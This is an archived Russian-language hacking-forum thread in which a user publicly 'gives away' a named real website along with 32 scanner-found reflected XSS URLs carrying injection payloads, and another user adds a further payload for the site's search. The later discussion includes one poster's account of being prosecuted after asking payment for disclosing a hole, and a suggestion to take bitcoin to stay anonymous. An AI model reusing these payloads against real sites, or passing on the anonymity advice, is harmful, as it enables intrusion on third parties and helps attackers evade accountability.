Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Нашел уязвимый сайт, отдаю. (https://forum.antichat.xyz/showthread.php?t=452909)

couldnot332 22.06.2017 23:23
Уязвимости:

| XSS:

| [+] Vul[1] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">alert('XSS')

| [+] Vul[2] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">'';!--"=&{()}

| [+] Vul[3] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[4] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[5] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[6] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[7] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[8] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[9] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">alert('XSS')

| [+] Vul[10] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">'';!--"=&{()}

| [+] Vul[11] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[12] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[13] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[14] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[15] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[16] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[17] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">alert('XSS')

| [+] Vul[18] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">'';!--"=&{()}

| [+] Vul[19] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[20] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[21] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[22] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[23] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[24] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[25] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">alert('XSS')

| [+] Vul[26] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">'';!--"=&{()}

| [+] Vul[27] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[28] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[29] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[30] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[31] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[32] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

h3xp1017 23.06.2017 03:53
да там и в поиске такая же ***ня и скорее всего вообще в любом поле

http://mirtesen.ru/market/search?search=">alert('pwn')

zer0_igL 23.06.2017 07:38
Хрень, нечего интересного!!!!! Постоянно перекидывает на search

SooLFaa 23.06.2017 13:52
И зачем для этого создавать отдельную тему? Есть соответствующая тема, для такой мелочевки, другое дело если бы ты известный ресурс какой слил, а тут всего лишь ХСС'ки

h3xp1017 23.06.2017 15:39
Цитата:
Сообщение от SooLFaa
SooLFaa said:

И зачем для этого создавать отдельную тему? Есть соответствующая тема, для такой мелочевки, другое дело если бы ты известный ресурс какой слил, а тут всего лишь ХСС'ки
при том найденные сканером

JustBE 24.06.2017 17:09
полная шляпа, перекидывает на search

Coost 06.07.2017 14:30
Меня так чуть не посадили за взлом сайта городской газеты с активной хсс

zer0_igL 06.07.2017 15:18
Цитата:
Сообщение от Coost
Coost said:

Меня так чуть не посадили за взлом сайта городской газеты с активной хсс
Анонимности тебе не занимать)))

Coost 06.07.2017 15:26
Цитата:
Сообщение от zer0_igL
zer0_igL said:

Анонимности тебе не занимать)))
Да я и сайту не врядил. Вставил безобидный алерт скрипт, связался с админом, предложил показать дырку за копейки, он согласился. Дал ему номер вебмани, он написал заявление в мусарню. Менты подали запрос в вебмани и получили мои данные (работали тк заяву написали журналисты, а так обычно им пох).

Ну и потом комп на экспертизу (благо, что ничего кроме этой формы не копали) и суд по статье 361 УК Украины.

Вот и делай людям добро. Пробили только по кошельку, анонимности хватало.

zer0_igL 06.07.2017 18:07
Цитата:
Сообщение от Coost
Coost said:

Да я и сайту не врядил. Вставил безобидный алерт скрипт, связался с админом, предложил показать дырку за копейки, он согласился. Дал ему номер вебмани, он написал заявление в мусарню. Менты подали запрос в вебмани и получили мои данные (работали тк заяву написали журналисты, а так обычно им пох).
Ну и потом комп на экспертизу (благо, что ничего кроме этой формы не копали) и суд по статье 361 УК Украины.
Вот и делай людям добро. Пробили только по кошельку, анонимности хватало.
Админ пидаром оказало, краснопузый мудозвон...

RWD 08.07.2017 01:04
Цитата:
Сообщение от Coost
Coost said:

предложил показать дырку за копейки
Это уже вымогательство, владельцы ресурса сами должны принимать решение о выплатах за сообщения об уязвимостях, а если уже пришло в голову подобным бредом заниматься, то хотя бы деньги на биткоин принимайте.

вебмани в 2к17

Coost 08.07.2017 06:54
Цитата:
Сообщение от RWD
RWD said:

Это уже вымогательство, владельцы ресурса сами должны принимать решение о выплатах за сообщения об уязвимостях, а если уже пришло в голову подобным бредом заниматься, то хотя бы деньги на биткоин принимайте.
вебмани в 2к17
А кто тебе сказал, что это было в 2к17? Тогда биткоинов ещё небыло.

Это не вымогательство. Вымогательство — это если бы я блокировал сайт через такую дырку и просил деньги за разблокировку. А ведь такая возможность была.


Время: 12:22